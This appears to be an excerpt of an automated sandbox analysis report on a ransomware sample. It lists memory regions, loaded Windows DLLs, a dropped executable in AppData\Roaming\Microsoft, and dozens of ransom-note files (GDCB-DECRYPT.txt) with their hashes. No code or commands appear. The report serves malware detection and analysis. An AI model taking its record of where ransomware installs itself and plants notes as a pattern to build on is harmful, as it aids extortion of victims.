private_0x0000000002f50000 0x02f50000 0x02f8ffff Private Memory Readable, Writable True True False
private_0x0000000002f90000 0x02f90000 0x0308ffff Private Memory Readable, Writable True True False
private_0x0000000003090000 0x03090000 0x030cffff Private Memory Readable, Writable True True False
private_0x00000000030d0000 0x030d0000 0x031cffff Private Memory Readable, Writable True True False
private_0x00000000031d0000 0x031d0000 0x0320ffff Private Memory Readable, Writable True True False
private_0x0000000003210000 0x03210000 0x0330ffff Private Memory Readable, Writable True True False
private_0x0000000003310000 0x03310000 0x0334ffff Private Memory Readable, Writable True True False
private_0x0000000003350000 0x03350000 0x0344ffff Private Memory Readable, Writable True True False
private_0x0000000003450000 0x03450000 0x0348ffff Private Memory Readable, Writable True True False
private_0x0000000003490000 0x03490000 0x0358ffff Private Memory Readable, Writable True True False
private_0x0000000003590000 0x03590000 0x035cffff Private Memory Readable, Writable True True False
private_0x00000000035d0000 0x035d0000 0x036cffff Private Memory Readable, Writable True True False
private_0x00000000036d0000 0x036d0000 0x0370ffff Private Memory Readable, Writable True True False
private_0x0000000003710000 0x03710000 0x0380ffff Private Memory Readable, Writable True True False
private_0x0000000003810000 0x03810000 0x0384ffff Private Memory Readable, Writable True True False
private_0x0000000003850000 0x03850000 0x0394ffff Private Memory Readable, Writable True True False
private_0x0000000003950000 0x03950000 0x0398ffff Private Memory Readable, Writable True True False
private_0x0000000003990000 0x03990000 0x03a8ffff Private Memory Readable, Writable True True False
private_0x0000000003a90000 0x03a90000 0x03acffff Private Memory Readable, Writable True True False
private_0x0000000003ad0000 0x03ad0000 0x03bcffff Private Memory Readable, Writable True True False
private_0x0000000003bd0000 0x03bd0000 0x03c0ffff Private Memory Readable, Writable True True False
private_0x0000000003c10000 0x03c10000 0x03d0ffff Private Memory Readable, Writable True True False
private_0x0000000003d10000 0x03d10000 0x03d4ffff Private Memory Readable, Writable True True False
private_0x0000000003d50000 0x03d50000 0x03e4ffff Private Memory Readable, Writable True True False
private_0x0000000003e50000 0x03e50000 0x03e8ffff Private Memory Readable, Writable True True False
private_0x0000000003e90000 0x03e90000 0x03f8ffff Private Memory Readable, Writable True True False
private_0x0000000003f90000 0x03f90000 0x03fcffff Private Memory Readable, Writable True True False
private_0x0000000003fd0000 0x03fd0000 0x040cffff Private Memory Readable, Writable True True False
private_0x00000000040d0000 0x040d0000 0x0410ffff Private Memory Readable, Writable True True False
private_0x0000000004110000 0x04110000 0x0420ffff Private Memory Readable, Writable True True False
private_0x0000000004210000 0x04210000 0x0424ffff Private Memory Readable, Writable True True False
private_0x0000000004250000 0x04250000 0x0434ffff Private Memory Readable, Writable True True False
private_0x0000000004350000 0x04350000 0x0438ffff Private Memory Readable, Writable True True False
private_0x0000000004390000 0x04390000 0x0448ffff Private Memory Readable, Writable True True False
private_0x0000000004490000 0x04490000 0x044cffff Private Memory Readable, Writable True True False
private_0x00000000044d0000 0x044d0000 0x045cffff Private Memory Readable, Writable True True False
private_0x00000000045d0000 0x045d0000 0x0460ffff Private Memory Readable, Writable True True False
private_0x0000000004610000 0x04610000 0x0470ffff Private Memory Readable, Writable True True False
private_0x0000000004710000 0x04710000 0x0474ffff Private Memory Readable, Writable True True False
private_0x0000000004750000 0x04750000 0x0484ffff Private Memory Readable, Writable True True False
private_0x0000000004850000 0x04850000 0x0488ffff Private Memory Readable, Writable True True False
private_0x0000000004890000 0x04890000 0x0498ffff Private Memory Readable, Writable True True False
private_0x0000000004990000 0x04990000 0x049cffff Private Memory Readable, Writable True True False
private_0x00000000049d0000 0x049d0000 0x04acffff Private Memory Readable, Writable True True False
wow64cpu.dll 0x5c9f0000 0x5c9f7fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64win.dll 0x5ca00000 0x5ca72fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64.dll 0x5ca80000 0x5cacefff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcr100.dll 0x732d0000 0x7338efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msimg32.dll 0x73390000 0x73395fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wininet.dll 0x73b20000 0x73d43fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
dwmapi.dll 0x740f0000 0x7410cfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
uxtheme.dll 0x74110000 0x74184fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
apphelp.dll 0x74190000 0x74220fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
bcryptprimitives.dll 0x74230000 0x74288fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptbase.dll 0x74290000 0x74299fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sspicli.dll 0x742a0000 0x742bdfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
user32.dll 0x74500000 0x7463ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imm32.dll 0x74730000 0x7475afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shell32.dll 0x74760000 0x75b1efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcrt.dll 0x75b80000 0x75c3dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
powrprof.dll 0x75c40000 0x75c83fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
advapi32.dll 0x75d40000 0x75dbafff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shlwapi.dll 0x75dc0000 0x75e03fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrt4.dll 0x75e70000 0x75f1bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernelbase.dll 0x75f20000 0x76095fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sechost.dll 0x760a0000 0x760e2fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shcore.dll 0x76280000 0x7630cfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
windows.storage.dll 0x764d0000 0x769acfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
gdi32.dll 0x769b0000 0x76afcfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel32.dll 0x76bc0000 0x76caffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
combase.dll 0x76cf0000 0x76ea9fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel.appcore.dll 0x76eb0000 0x76ebbfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
crypt32.dll 0x76ec0000 0x77034fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
profapi.dll 0x77050000 0x7705efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msasn1.dll 0x77060000 0x7706dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msctf.dll 0x77070000 0x7718ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntdll.dll 0x77190000 0x77308fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x000000007fe50000 0x7fe50000 0x7fe52fff Private Memory Readable, Writable True True False
private_0x000000007fe53000 0x7fe53000 0x7fe55fff Private Memory Readable, Writable True True False
private_0x000000007fe56000 0x7fe56000 0x7fe58fff Private Memory Readable, Writable True True False
private_0x000000007fe59000 0x7fe59000 0x7fe5bfff Private Memory Readable, Writable True True False
private_0x000000007fe5c000 0x7fe5c000 0x7fe5efff Private Memory Readable, Writable True True False
private_0x000000007fe5f000 0x7fe5f000 0x7fe61fff Private Memory Readable, Writable True True False
private_0x000000007fe62000 0x7fe62000 0x7fe64fff Private Memory Readable, Writable True True False
private_0x000000007fe65000 0x7fe65000 0x7fe67fff Private Memory Readable, Writable True True False
private_0x000000007fe68000 0x7fe68000 0x7fe6afff Private Memory Readable, Writable True True False
private_0x000000007fe6b000 0x7fe6b000 0x7fe6dfff Private Memory Readable, Writable True True False
private_0x000000007fe6e000 0x7fe6e000 0x7fe70fff Private Memory Readable, Writable True True False
private_0x000000007fe71000 0x7fe71000 0x7fe73fff Private Memory Readable, Writable True True False
private_0x000000007fe74000 0x7fe74000 0x7fe76fff Private Memory Readable, Writable True True False
private_0x000000007fe77000 0x7fe77000 0x7fe79fff Private Memory Readable, Writable True True False
private_0x000000007fe7a000 0x7fe7a000 0x7fe7cfff Private Memory Readable, Writable True True False
private_0x000000007fe7d000 0x7fe7d000 0x7fe7ffff Private Memory Readable, Writable True True False
private_0x000000007fe80000 0x7fe80000 0x7fe82fff Private Memory Readable, Writable True True False
private_0x000000007fe83000 0x7fe83000 0x7fe85fff Private Memory Readable, Writable True True False
private_0x000000007fe86000 0x7fe86000 0x7fe88fff Private Memory Readable, Writable True True False
private_0x000000007fe89000 0x7fe89000 0x7fe8bfff Private Memory Readable, Writable True True False
private_0x000000007fe8c000 0x7fe8c000 0x7fe8efff Private Memory Readable, Writable True True False
private_0x000000007fe8f000 0x7fe8f000 0x7fe91fff Private Memory Readable, Writable True True False
private_0x000000007fe92000 0x7fe92000 0x7fe94fff Private Memory Readable, Writable True True False
private_0x000000007fe95000 0x7fe95000 0x7fe97fff Private Memory Readable, Writable True True False
private_0x000000007fe98000 0x7fe98000 0x7fe9afff Private Memory Readable, Writable True True False
private_0x000000007fe9b000 0x7fe9b000 0x7fe9dfff Private Memory Readable, Writable True True False
private_0x000000007fe9e000 0x7fe9e000 0x7fea0fff Private Memory Readable, Writable True True False
private_0x000000007fea1000 0x7fea1000 0x7fea3fff Private Memory Readable, Writable True True False
private_0x000000007fea4000 0x7fea4000 0x7fea6fff Private Memory Readable, Writable True True False
private_0x000000007fea7000 0x7fea7000 0x7fea9fff Private Memory Readable, Writable True True False
private_0x000000007feaa000 0x7feaa000 0x7feacfff Private Memory Readable, Writable True True False
private_0x000000007feaa000 0x7feaa000 0x7feacfff Private Memory Readable, Writable True True False
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007ffd5000 0x7ffd5000 0x7ffd7fff Private Memory Readable, Writable True True False
private_0x000000007ffd8000 0x7ffd8000 0x7ffdafff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffdb000 0x7ffdb000 0x7ffddfff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
  • Region Actions
private_0x000000007fff0000 0x7fff0000 0x7ffb3d30ffff Private Memory Readable True False False
  • Region Actions
ntdll.dll 0x7ffb3d310000 0x7ffb3d4d1fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x00007ffb3d4d2000 0x7ffb3d4d2000 0x7ffffffeffff Private Memory Readable True False False
  • Region Actions
For performance reasons, the remaining 130 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe 128.50 KB (131584 bytes) MD5: 2548e6fc9eb17e55d22dcfb4bf27212d
SHA1: 93dd44a5f16cedd2f4793bd8b9a19523d49fc9e8
SHA256: 5d53050a1509bcc9d97552fa52c1105b51967f4ccf2bde717b502605db1b5011 		False
c:\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\$recycle.bin\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\$recycle.bin\s-1-5-18\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\$recycle.bin\s-1-5-21-1462094071-1423818996-289466292-1000\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\bg-bg\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\cs-cz\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\da-dk\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\de-de\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\el-gr\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\en-gb\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\en-us\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\es-es\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\es-mx\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\et-ee\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\fi-fi\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\fonts\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\fr-ca\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\fr-fr\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\hr-hr\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\hu-hu\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\it-it\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\ja-jp\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\ko-kr\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\lt-lt\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\lv-lv\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\nb-no\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\nl-nl\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\pl-pl\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\pt-br\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\pt-pt\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\qps-ploc\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\resources\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\resources\en-us\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\ro-ro\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\ru-ru\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\sk-sk\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\sl-si\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\sr-latn-cs\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\sr-latn-rs\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\sv-se\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\tr-tr\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\uk-ua\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\zh-cn\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\zh-hk\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\boot\zh-tw\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\perflogs\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\recovery\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\recovery\windowsre\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\collab\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\forms\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\jscache\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\security\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\security\crlcache\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\flash player\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
